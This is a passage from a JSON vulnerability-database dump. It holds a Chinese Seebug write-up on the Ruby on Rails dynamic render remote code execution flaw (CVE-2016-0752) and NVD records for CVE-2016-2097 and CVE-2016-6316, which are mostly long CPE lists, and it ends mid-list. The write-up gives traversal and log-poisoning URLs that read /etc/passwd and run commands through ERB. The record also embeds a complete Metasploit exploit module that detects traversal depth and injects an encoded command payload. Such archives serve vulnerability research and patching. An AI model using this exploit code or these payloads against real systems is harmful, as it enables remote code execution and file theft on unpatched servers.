`//etc/passwd`\uff0c\u8fd9\u65f6\u5982\u679c\u80fd\u591f\u8bbf\u95ee\u5230 `//etc/passwd` \u6587\u4ef6\uff0c\u5e94\u7528\u4f1a\u5c06\u5176\u6587\u4ef6\u5185\u5bb9\u4f5c\u4e3a\u6a21\u7248\u8fdb\u884c\u6e32\u67d3\uff1a\r\n\r\n\r\n\r\n**\u914d\u5408\u8bbf\u95ee\u65e5\u5fd7\u6267\u884c\u547d\u4ee4**\r\n\r\nRails\u5e94\u7528\u6587\u4ef6log/development.log\u5b58\u50a8\u7684\u662f\u7528\u6237\u8bbf\u95ee\u65e5\u5fd7\uff0c\u6839\u636e2.1\u73b0\u5728\u5df2\u7ecf\u80fd\u63a7\u5236\u6e32\u67d3\u7684\u6a21\u677f\u6587\u4ef6\u8def\u5f84\uff0c\u501f\u52a9\u8bbf\u95ee\u65e5\u5fd7\u5c31\u53ef\u4ee5\u63a7\u5236\u6e32\u67d3\u6a21\u7248\u7684\u5185\u5bb9\u3002\u501f\u52a9Rails\u7684\u6a21\u677f\u5f15\u64ce\uff0c\u5728\u6a21\u677f\u5185\u5bb9\u4e2d\u63d2\u5165\u6a21\u677f\u5143\u7d20<%= `ifconfig` %>\uff0c\u8868\u793a\u5c06 ifconfig \u7cfb\u7edf\u547d\u4ee4\u7684\u7ed3\u679c\u4f5c\u4e3a\u6e32\u67d3\u5185\u5bb9\u8fdb\u884c\u8fd4\u56de\u3002\r\n\r\n\u8bbf\u95eehttp://192.168.199.205:3000/vuln/index?q=<%25=%20`ifconfig`%20%25>\uff0c\u4f1a\u5728log/development.log\u4e2d\u7559\u4e0b\u8bb0\u5f55\uff1a\r\n\r\n\r\n\r\n\u8fd9\u65f6\u901a\u8fc7\u63a7\u5236\u6a21\u7248\u6587\u4ef6\u6e32\u67d3\u4e3alog/development.log\uff0c\u5373\u53ef\u5c06\u76ee\u6807\u4e3b\u673a\u7684\u7f51\u7edc\u4fe1\u606f\u901a\u8fc7\u9875\u9762\u7ed3\u679c\u8fd4\u56de\uff0chttp://192.168.199.205:3000/vuln/index?q=../../log/development.log\uff1a\r\n\r\n\r\n\r\n### \u6f0f\u6d1e\u5f71\u54cd\r\n\r\n\u4ece zoomeye.org \u4e0a\u641c\u7d22\u4f7f\u7528\u4e86 Rails \u6846\u67b6\u7684\u7ad9\u70b9\uff1a\r\n\r\n\r\n\r\n\u5168\u7403\u5927\u7ea6\u6709**12w**\u4e2a\u4f7f\u7528\u4e86Rails\u7684\u7ad9\u70b9**\u53ef\u80fd**\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n\r\n\u540c\u65f6\u4e5f\u53ef\u4ee5\u5728 Github \u4e0a\u641c\u7d22 `render params` \u6765\u67e5\u770b\u6f5c\u5728\u53d7\u5230\u5f71\u54cd\u7684 \u9879\u76ee:\r\n\r\n\r\n\r\n\u53ef\u4ee5\u770b\u5230\u4e5f\u6709\u5927\u91cf\u7684\u9879\u76ee\u7b26\u5408\u8fd9\u6837\u7684\u4ee3\u7801\u5199\u6cd5,\u53ef\u80fd\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002", "cvss3": {}, "published": "2016-01-27T00:00:00", "type": "seebug", "title": "Rails Dynamic Render \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (CVE-2016-0752)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0130", "CVE-2016-0752"], "modified": "2016-01-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90633", "id": "SSV:90633", "sourceData": "\n require 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n @@trav_string = '%5c%2e%2e%2f'\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ruby on Rails Dynamic Render Directory Traversal + Code Exec',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in the explicit render\r\n method when leveraging user parameters.\r\n This module has been tested across multiple versions of RoR 3.x and RoR 4.x\r\n The technique used by this module requires the specified endpoint to be using\r\n dynamic render paths, such as the following example:\r\n def show\r\n render params[:id]\r\n end\r\n },\r\n 'Author' =>\r\n [\r\n 'John Poulin (forced-request)'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' => \r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl telnet'\r\n }\r\n },\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n [ 'CMD',\r\n {\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/user\"]),\r\n OptString.new('LOGFILE', [ true, 'The environment\\'s log file', 'log%2fdevelopment%2elog']),\r\n OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST', 'PUT'] ]),\r\n OptString.new('COOKIES', [ false, 'HTTP headers, including auth headers and cookies', ''])\r\n ], self.class)\r\n end\r\n\r\n def vuln\r\n desired_location = 'Gemfile'\r\n\r\n # Initial payload\r\n p = desired_location\r\n\r\n # Search for depth up to 10 to detect if server is vuln\r\n 11.times do |i|\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n\r\n # Check if response contains Gemfile info\r\n if res.body.match(/^gem /)\r\n @depth = i\r\n print_good(\"It appears that this application is vulnerable\")\r\n return true\r\n end\r\n\r\n # Prepare next payload\r\n p = @@trav_string + p\r\n end\r\n return false\r\n end\r\n\r\n def send_payload\r\n p = datastore['LOGFILE']\r\n (@depth).times do |i|\r\n p = @@trav_string + p\r\n end\r\n\r\n p = p + \"?p=%3c%25%20%60\" + CGI::escape(payload.encoded) + \"%60%25%3e\"\r\n print_status(\"Sending payload: #{p}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n end\r\n\r\n def render_log\r\n p = datastore['LOGFILE']\r\n (@depth).times do |i|\r\n p = @@trav_string + p\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n end\r\n\r\n #\r\n # Send the actual request\r\n #\r\n def exploit\r\n print_status(\"Sending initial request to detect exploitability\")\r\n\r\n # Check if vulnerable\r\n if vuln\r\n print_status(\"Attempting to exploit\")\r\n \r\n send_payload\r\n else\r\n print_error(\"Application does not appear vulnerable\")\r\n end\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-90633", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2023-02-09T14:06:31", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-04-07T23:59:00", "type": "cve", "title": "CVE-2016-2097", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:4.1.7.1", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.1.14", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:ruby_on_rails:4.1.14.1", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22.1", "cpe:/a:rubyonrails:rails:4.1.13", "cpe:/a:rubyonrails:rails:4.0.8"], "id": "CVE-2016-2097", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2097", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.1.10:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:15:48", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails 3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow remote attackers to inject arbitrary web script or HTML via text declared as \"HTML safe\" and used as attribute values in tag handlers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-09-07T19:28:00", "type": "cve", "title": "CVE-2016-6316", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:3.0.11", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:ruby_on_rails:3.2.19", "cpe:/a:rubyonrails:rails:3.0.16", "cpe:/a:rubyonrails:rails:3.1.5", "cpe:/a:rubyonrails:rails:3.0.17", "cpe:/a:rubyonrails:ruby_on_rails:3.2.14", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:3.0.12", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:3.0.5", "cpe:/a:rubyonrails:rails:3.1.9", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:rails:4.2.5.1", "cpe:/a:rubyonrails:rails:3.0.19", "cpe:/a:rubyonrails:rails:3.2.13", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:ruby_on_rails:4.0.10", "cpe:/a:rubyonrails:rails:3.2.7", "cpe:/a:rubyonrails:rails:5.0.0", "cpe:/a:rubyonrails:rails:3.2.22.2", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:rails:4.1.16", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22", "cpe:/a:rubyonrails:rails:3.1.2", "cpe:/a:rubyonrails:rails:4.1.13", "cpe:/a:rubyonrails:rails:3.2.11", "cpe:/a:rubyonrails:ruby_on_rails:3.0.4", "cpe:/a:rubyonrails:rails:3.0.8", "cpe:/a:rubyonrails:rails:3.0.13", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:ruby_on_rails:4.0.12", "cpe:/a:rubyonrails:rails:3.1.0", "cpe:/a:rubyonrails:rails:4.1.14.2", "cpe:/a:rubyonrails:rails:3.2.10", "cpe:/a:rubyonrails:rails:3.0.0", "cpe:/a:rubyonrails:rails:3.1.3", "cpe:/a:rubyonrails:rails:3.0.14", "cpe:/a:rubyonrails:rails:3.2.18", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:3.2.3", "cpe:/a:rubyonrails:rails:3.2.16", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:3.1.8", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:ruby_on_rails:3.2.15", "cpe:/a:rubyonrails:rails:3.2.1", "cpe:/a:rubyonrails:rails:3.2.15", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11", "cpe:/a:rubyonrails:rails:3.1.6", "cpe:/a:rubyonrails:rails:3.1.10", "cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:3.0.2", "cpe:/a:rubyonrails:rails:3.2.0", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.2.7", "cpe:/a:rubyonrails:ruby_on_rails:3.2.20", "cpe:/a:rubyonrails:rails:3.1.4", "cpe:/a:rubyonrails:rails:3.0.3", "cpe:/a:rubyonrails:ruby_on_rails:4.1.11", "cpe:/a:rubyonrails:ruby_on_rails:4.0.13", "cpe:/a:rubyonrails:rails:4.1.7.1", "cpe:/a:rubyonrails:rails:3.2.9", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:3.0.6", "cpe:/a:rubyonrails:rails:3.0.4", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:rails:3.2.5", "cpe:/a:rubyonrails:rails:3.2.17", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:3.0.10", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22.1", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:rails:3.0.18", "cpe:/a:rubyonrails:rails:4.0.8", "cpe:/a:rubyonrails:rails:3.0.20", "cpe:/a:rubyonrails:rails:4.2.5.2", "cpe:/a:rubyonrails:rails:3.1.12", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:3.2.6", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:rails:3.2.2", "cpe:/a:rubyonrails:rails:3.0.1", "cpe:/a:rubyonrails:rails:3.0.9", "cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.2.6", "cpe:/a:rubyonrails:rails:3.2.21", "cpe:/a:rubyonrails:rails:3.2.4", "cpe:/a:rubyonrails:rails:4.1.14", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:3.2.8", "cpe:/a:rubyonrails:rails:4.1.15", "cpe:/a:rubyonrails:rails:3.1.1", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:rails:3.1.7", "cpe:/a:rubyonrails:ruby_on_rails:4.1.14.1", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:ruby_on_rails:5.0.0", "cpe:/a:rubyonrails:rails:3.2.12", "cpe:/a:rubyonrails:rails:3.0.7"], "id": "CVE-2016-6316", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.13:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.15:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.8:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.16:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.9:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.9:rc5:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:5.0.0:racecar1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:rc8:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.8:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.8:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.15:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.1.0:rc7:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:3.0.8:rc4:*:*:*:*:*:*", 